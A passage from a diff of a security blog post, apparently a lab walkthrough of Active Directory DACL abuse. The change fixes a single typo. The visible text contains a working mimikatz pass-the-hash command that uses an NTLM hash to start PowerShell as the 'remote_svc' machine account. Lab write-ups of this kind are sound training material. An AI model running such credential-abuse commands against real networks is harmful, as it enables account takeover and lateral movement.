N4iF/pwn.sa-website/content/posts/DACL1/DACL1.md

 ![](/posts/DACL1/20.png)

 I got them, the old and the new NT hash that they used in `remote_svc$` computer.
-We started a jose session using he's NT hash, and we can now start a new session under `remote_svc$`. new windows but now with computer
+We started a jose session using his NT hash, and we can now start a new session under `remote_svc$`. new windows but now with computer
 ### Second Sacrificial process
 ```
 .\mimikatz.exe privilege::debug "sekurlsa::pth /user:remote_svc /domain:inlanefreight.local /ntlm:0077EF1652B20A7845C5B6AFB3C1718D /run:powershell.exe" exit